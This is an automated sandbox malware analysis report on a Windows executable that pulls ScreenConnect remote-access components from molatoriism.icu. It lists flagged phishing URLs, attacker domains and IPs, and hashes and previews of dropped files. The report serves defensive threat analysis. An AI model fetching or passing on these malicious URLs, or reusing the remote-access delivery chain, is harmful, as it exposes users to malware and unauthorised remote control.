                                                                                                  unknown
                                                                                                  http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConnedfsvc.exe, 00000001.00000002.3917244971.0000023571713000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: phishing
                                                                                                    unknown
                                                                                                    https://signup.live.com/signup.aspxsvchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B55000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://molatoriism.icu/Bin/ScreenConnect.Windows.dllddfsvc.exe, 00000001.00000002.3909247631.000002356D1C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: phishing
                                                                                                      unknown
                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://molatoriism.icu/Bin/ScreenConnect.ClientSedfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: phishing
                                                                                                          unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 0000000D.00000002.3887410161.000001D224B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2651783378.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677210493.000001D2252C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887521934.000001D224B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 0000000D.00000002.3887521934.000001D224B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000001.00000002.3886946834.0000023500089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://login.microsoftonline.com/ppsecure/devicechangecredential.srfTokensvchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://upx.sf.netAmcache.hve.12.drfalse
                                                                                                                          high
                                                                                                                          http://ocsp.digicert.codfsvc.exe, 00000001.00000002.3886946834.000002350024F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 0000000D.00000002.3888112715.000001D22526A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.182.214 | molatoriism.icu | United States | 13335 | CLOUDFLARENETUS | false
62.182.85.100 | pick09y.top | Ukraine | 205172 | YANINA-ASUA | false

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1551436
Start date and time: 2024-11-07 18:03:21 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: pzPO97QouM.exe
renamed because original name is a hash value
Original Sample Name: fe9cb4c7eaa00078639484c209a3acf1d5195cbec55bd7981e733fb179bea899.exe
Detection: MAL
Classification: mal60.evad.winEXE@20/78@2/3
EGA Information:
• Successful, ratio: 85.7%
HCA Information:
• Successful, ratio: 67%
• Number of executed functions: 249
• Number of non-executed functions: 26
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                        • Excluded IPs from analysis (whitelisted): 93.184.221.240, 192.229.221.95, 184.28.90.27, 20.190.159.4, 20.190.159.68, 20.190.159.71, 40.126.31.71, 40.126.31.67, 40.126.31.69, 20.190.159.23, 20.190.159.0, 20.189.173.22
                                                                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, cacerts.digicert.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                        • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 3652 because it is empty
                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                        • VT rate limit hit for: pzPO97QouM.exe
Time | Type | Description
12:04:46 | API Interceptor | 4424740x Sleep call for process: dfsvc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
172.67.182.214 | http://molatoriism.icu | malicious | HTMLPhisher
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                              Entropy (8bit):0.3588072191296206
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:6xkoaaD0JOCEfMuaaD0JOCEfMKQmDhxkoaaD0JOCEfMuaaD0JOCEfMKQmD:maaD0JcaaD0JwQQ3aaD0JcaaD0JwQQ
                                                                                                                                                                              MD5:663C5D6018506231E334FB3EA962ED1C
                                                                                                                                                                              SHA1:539A4641CE92E57E4ADEE32750A817326E596D4C
                                                                                                                                                                              SHA-256:066CB701C03237D2612AA647E6BF08EF594360F96E433639B0CC9EED7335F1E1
                                                                                                                                                                              SHA-512:5F910653FD1B12B94D314EDEDF6EB2BEC70D369D921EB5B7CF4D199B0374D6C798336E39DBF2781F3B0457280E0DDA63BDF4861DF31C08152544B0F1039D5FCD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                              Entropy (8bit):0.8337324322656293
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug9:gJjJGtpTq2yv1AuNZRY3diu8iBVqFf
                                                                                                                                                                              MD5:B0DF559D48CCBCFF5595A5046CE23FDE
                                                                                                                                                                              SHA1:B7EEEF3F04D10E3DD0C1EF8E70203AF57F524B47
                                                                                                                                                                              SHA-256:2C0DDCF23CDA73A4065ACC7C486671B4869E52B7417BC295A7A892D07C4E6E77
                                                                                                                                                                              SHA-512:05697CB544F0883563DA04991D3AC40F6E709DD646AAECFE7FDE00D7C651B3037647515E06635C7C2A87A727E18D326EECC6FACE8D2D9B075482D89089BB13C8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1a78c5f8, page size 16384, Windows version 10.0
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                              Entropy (8bit):0.6585010691219028
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:BSB2ESB2SSjlK/AxrO1T1B0CZSJWYkr3g16n2UPkLk+kdbI/0uznv0M1Dn/didMV:Baza6xhzA2U8HDnAPZ4PZf9h/9h
                                                                                                                                                                              MD5:83CEF5C9D19FD27677B5999030101F73
                                                                                                                                                                              SHA1:47FFBC2A1CE385AF941E71BE97017F3C49ADCE46
                                                                                                                                                                              SHA-256:777A460CD93615B102AA704E8783CBE568ADE2F0604B844E8C6A8A5DE262BA55
                                                                                                                                                                              SHA-512:6F228FD6BE576BC762CFEAFF087E8402C1AB14133A9DA82DF850D93A184FBC3708DF40587DB59AF325C7AB3AC9CD253DD34C48B50F3B0879F5CDC77EB25A7BD7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                              Entropy (8bit):0.08036877904048498
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:P/lWetYeAiNALER/lX+ICETxaL/MgIwR/lall58Kgvvl/QoeP/ll:Pdz8LAx+ICSGbIcAz8KgR+t
                                                                                                                                                                              MD5:F4B2229FAF91636F7C49D74192363B78
                                                                                                                                                                              SHA1:F580F355AAFAEE03A1E4955B00201D6B797852CE
                                                                                                                                                                              SHA-256:F72A9E3A1AB402A7DC7058176E3AD1A27C7B344D546C49108BDD9B8A38A48595
                                                                                                                                                                              SHA-512:9909EF756B8474830896A34775E0AFE85AC6640D0D13395FC67E79339A39BF8DEA3B3F20B88748E1CE7190B5520C6935FFD721FEF63411E95D35FD76AB49DAFA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                              Entropy (8bit):0.8983528544211888
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:PMFOH3swhqvGXyf8QXIDcQvc6QcEVcw3cE/n+HbHg/JgnQoFyOuawrn5kBu77oww:UUH3sP0BU/gjExlzuiFPZ24IO8r
                                                                                                                                                                              MD5:4FE7480742B52ED435A29A7A573BB65F
                                                                                                                                                                              SHA1:F7CFAA2DF0CB27E88FB97597EBA355328855F0CA
                                                                                                                                                                              SHA-256:C83EBEAF81BE4132C7901E9CE30653D104E453659943746E66AB16021FBD1693
                                                                                                                                                                              SHA-512:550838D310EF5D6E015ADA3937BC9A646465484D415ABCC49AF4CAFA054A4D721EA54FD814B24F22ECDCD2312FCB0EEF0F03502EADE9702DB6858FA9711F3FA0
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:Version=1..EventType=APPCRASH..EventTime=133754726957740761..ReportType=2..Consent=1..UploadTime=133754726973990858..ReportStatus=524384..ReportIdentifier=bbab6c25-3759-41cb-84f1-cfd584cd677b..IntegratorReportIdentifier=cf3e96c1-ec61-4ae8-84d8-37edece5c3f0..Wow64Host=34404..Wow64Guest=332..NsAppName=pzPO97QouM.exe..AppSessionGuid=000016e0-0001-0014-c815-33103731db01..TargetAppId=W:000630a76ea19d9e82e9152699e277ee6a4f0000ffff!0000b2a6e75ade18f10e2d0cd709630f5e551dbcefae!pzPO97QouM.exe..TargetApp
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Thu Nov 7 17:04:56 2024, 0x1205a4 type
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):77858
                                                                                                                                                                              Entropy (8bit):1.665341212541505
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:7/+AXaIX206OEI/yyl2KCRXm0MguMflmrW5w7uSkCGqe1rMGCE:iZ8EI/vDq20Mgu25w7uckr
                                                                                                                                                                              MD5:272DDB611861A2010D0C521AE726C950
                                                                                                                                                                              SHA1:69ACDFA1BB1AF5462EDF2C094732AA310FCB22BD
                                                                                                                                                                              SHA-256:DC7E2020B55C01AD4952F687D119B726F4A5F4572FE69D6D9202D5B3A6C254F1
                                                                                                                                                                              SHA-512:7F68AE87D6330102BEB65BA5E0F15D4384E73658C86EF85CDA41B54CA2DE01D51E3AEB43817CC715792AD00EE3023D0900C1CE9C81F0C0155D69C422FF7F1582
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:MDMP..a..... .......8.,g............T...............h.......<...$...........<8..........`.......8...........T...........h ..............`...........L...............................................................................eJ..............GenuineIntel............T.............,g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):8326
                                                                                                                                                                              Entropy (8bit):3.7002203707437924
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:R6l7wVeJSt6i6YEI4SU99tgmfEtRprv89bQ2sf1CQm:R6lXJA6i6YEHSU99tgmfEtcQVf6
                                                                                                                                                                              MD5:5F122BC6EB60F89652AEBF98095905B9
                                                                                                                                                                              SHA1:205313F2C6BC5B23EFB4323F941870EAEF8F9E0C
                                                                                                                                                                              SHA-256:BEEA03860BF8F538BCA293B42699B8E8A621890C111EA43EAA5B6E371A9A7092
                                                                                                                                                                              SHA-512:935C29B2B4FA39949B8F95DF8416F75F6F18980CD28A8870A5323F79F36A6E97A597FD55194DD04506C98569742183024D92874754EB2A1818877E2A863FF344
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>5856</Pi
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4593
                                                                                                                                                                              Entropy (8bit):4.483823828949974
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:cvIwWl8zstJg77aI9PMWpW8VYuYm8M4JQQLFH+q83ALBwkeid:uIjfHI79l7VOJQ+VFVeid
                                                                                                                                                                              MD5:BB71EAF2682465FA68D59428880B5E1A
                                                                                                                                                                              SHA1:5D06E96BFC8964FB1F999E448AF25811622931BB
                                                                                                                                                                              SHA-256:AB8E9242614F6AD335FBA5A377522337FF39CFD3F02134904B2585B09FAAC6C2
                                                                                                                                                                              SHA-512:6C5C11316A4836A539F52406187D9494410241D13D5EE4EB2A9399B6A02BAF2E7685253A9B3368CDE0F3D21045F5DFAE7AA99C274633DDB3FBA12A91A8B073AC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="577927" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):77522
                                                                                                                                                                              Entropy (8bit):3.0517256042644094
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:wYZZfEMkGFu8W++y/VWJGcY9aZ7Z4H//CnDRZV8:9ZZfEMkGFb+2eLY9aZ4//8Dvq
                                                                                                                                                                              MD5:FCB5BB1CE71B042708002F95E2EC0D5B
                                                                                                                                                                              SHA1:CEC600C16728EE421C556C990A1ABFDF2AC003C5
                                                                                                                                                                              SHA-256:21B9658D784CCA309D1E544F16F17073BA7E5B00968EB43F2026A2343D67D9DA
                                                                                                                                                                              SHA-512:D41B7CAA26506059C400A7DF659F0092D71F70767D04F2CBFA29D067E3159031C1656F3E093CA63E2A95AB53DC85D1E196935217A2C327ADD9F52997FEE798EA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):13340
                                                                                                                                                                              Entropy (8bit):2.6850626752335374
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:TiZYWIe6S8CdYLYnW9lH4YEZcztCip3tCBBwihAvamK8M0sFIz73:2ZDIuc/gR8amK8M0saz73
                                                                                                                                                                              MD5:7E12436D1893CB0129A78260ADE191CD
                                                                                                                                                                              SHA1:01EE9000472C4AED9EA1E4718391D22EC2EC3D3D
                                                                                                                                                                              SHA-256:14894776979389777726C16917CDB8BFD10CE6E69574D405D0E8190EF4745118
                                                                                                                                                                              SHA-512:40C3618DB21FAEB83BBF5D208611159CA3B081FD33384ABF68A49F53CD2FF29CCE3790D70A0C43403420D2C6E7E5E8EA3980B152F8A96A1CD40A924808EB1451
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4770
                                                                                                                                                                              Entropy (8bit):7.946747821604857
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                              MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                              SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                              SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                              SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):71954
                                                                                                                                                                              Entropy (8bit):7.996617769952133
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:Certificate, Version=3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1716
                                                                                                                                                                              Entropy (8bit):7.596259519827648
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                              MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                              SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                              SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                              SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):727
                                                                                                                                                                              Entropy (8bit):7.591493461244967
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:5onfZGyc5RlRtBfQgyusAO+NEg3xO/MwGE2Mqyry/oUp2nWmyJQLYC0pH:5ikycdZNyuIJ/ZG7MqyryEnWNJQL8H
